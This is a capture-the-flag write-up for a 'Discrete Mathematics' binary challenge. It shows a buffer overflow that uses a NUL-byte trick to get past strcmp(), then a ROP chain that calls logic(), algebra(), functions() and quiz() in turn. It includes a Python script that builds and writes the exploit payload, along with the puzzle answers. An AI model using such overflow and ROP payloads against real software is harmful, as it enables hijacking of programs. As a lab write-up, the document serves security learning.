Discrete Mathematics
Buffer overflow, with a ROP chain.
Last updated
The same challenge, but this time we need to build a ROP chain.
We can't just jump to quiz() directly, since we need to make knows_logic, knows_algebra, and knows_functions True first. Each of these variables is only set inside its corresponding function: logic(), algebra() and functions().
If we lay out the chain as follows, each function's ret pops the next address we supplied, so we control where every subsequent return goes. Again, we have to bypass the strcmp() check, which stops at the first NUL byte while the overflow keeps copying past it:
Prepare our cyclic pattern payload:
python -c "print 'i will get an A' + '\x00' + 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'" > ipt.txt
We find that the offset is 56.
We find the function addresses:
logic: 0x00401236
algebra: 0x00401336
functions: 0x0040144d
quiz: 0x00401544
Now, we get an interactive connection where we will first jump to logic(), then algebra(), then functions(), and finally quiz().
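The payload that does this, as an added example written for this writeup (not the original solve script): the strcmp() prefix, filler up to the saved return address, then the four function addresses in the order they should run. It assumes a non-PIE x86-64 binary (the 0x40xxxx addresses suggest this) and that the offset of 56 was measured from the start of the cyclic pattern, i.e. after the 16-byte prefix, so OFFSET is the amount of filler after the prefix. The optional ret_gadget parameter is hypothetical: no such gadget address appears in the writeup, it is only there for the stack-alignment check described below.

```python
import struct

# Addresses taken from the writeup (non-PIE x86-64 binary, so they are fixed).
FUNCS = {
    "logic":     0x401236,
    "algebra":   0x401336,
    "functions": 0x40144d,
    "quiz":      0x401544,
}

# strcmp() compares up to the NUL, so the check sees "i will get an A";
# the overflowing copy keeps going past it, so the rest of the buffer is ours.
PREFIX = b"i will get an A\x00"

# Assumption: the cyclic offset of 56 was measured from the start of the
# pattern, which began right after PREFIX, so 56 bytes of filler follow it.
OFFSET = 56


def p64(value):
    """Little-endian 8-byte pack, like pwntools' p64()."""
    return struct.pack("<Q", value)


def build_chain(order=("logic", "algebra", "functions", "quiz"),
                prefix=PREFIX, offset=OFFSET, ret_gadget=None):
    """Return prefix + filler + a chain of whole-function return addresses.

    Each function we return into eventually executes ret, which pops the
    next 8 bytes we placed on the stack, so the functions run in 'order'.
    ret_gadget (hypothetical, not from the writeup) is inserted before the
    last entry when a 16-byte stack alignment is needed before quiz().
    """
    chain = [FUNCS[name] for name in order]
    if ret_gadget is not None:
        chain.insert(len(chain) - 1, ret_gadget)
    return prefix + b"A" * offset + b"".join(p64(addr) for addr in chain)


def chain_from_payload(payload, prefix=PREFIX, offset=OFFSET):
    """Decode the return addresses back out of a payload (sanity check)."""
    body = payload[len(prefix) + offset:]
    return [struct.unpack("<Q", body[i:i + 8])[0] for i in range(0, len(body), 8)]


def write_payload(path="ipt.txt"):
    """Write the payload to a file, matching how the writeup feeds the binary."""
    payload = build_chain()
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    pl = build_chain()
    print(len(pl), [hex(a) for a in chain_from_payload(pl)])
```

Two checks before trusting this: if the binary uses fgets() or read(), the NUL and the addresses (which contain NUL bytes) pass through intact, but a strcpy()-style copy would truncate at the first NUL, in which case the prefix trick would not work at all. And if the process crashes on a movaps inside a libc call after the chain starts running, the stack is misaligned; that is what the ret_gadget slot is for, using a ret gadget found in the binary.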
We just have to figure out the appropriate values to pass the checks.
From (q != s) && s, we know s must be 1 and q must be 0.
Then, from (p || q || !r) && (!p || r || !s), substituting q = 0 and s = 1 gives (p || 0 || !r) && (!p || r || 0), which is (p || !r) && (!p || r), i.e. p and r must be equal. Either p = r = 0 or p = r = 1 works.
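The same two constraints, solved by exhausting the 16 truth assignments instead of by hand. This is an added example, not code from the writeup; the two predicates are transcribed from the conditions quoted above and the variable order (p, q, r, s) is my choice.

```python
from itertools import product


def logic_checks(p, q, r, s):
    """The two conditions logic() tests, transcribed from the writeup."""
    first = (q != s) and s
    second = (p or q or not r) and (not p or r or not s)
    return first and second


def solve(pred, nvars):
    """Brute-force every truth assignment and keep the satisfying ones."""
    return [vals for vals in product((False, True), repeat=nvars) if pred(*vals)]


def logic_solutions():
    """Satisfying (p, q, r, s) tuples as ints, ready to type into the binary."""
    return [tuple(int(v) for v in sol) for sol in solve(logic_checks, 4)]


if __name__ == "__main__":
    for p, q, r, s in logic_solutions():
        print(f"p={p} q={q} r={r} s={s}")
```

The exhaustive search confirms the hand derivation: s = 1, q = 0, and p = r, giving exactly two assignments. For larger formulas the same solve() helper works unchanged, only the predicate and variable count differ.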
We can solve the simultaneous equations to get:
x = 3
y = -17
z = 12
The values seemed pretty small, so a brute-force script over a small integer range easily recovers them.
We have:
a = 2
b = -8
c = 6
Plugging these values in, we get the flag.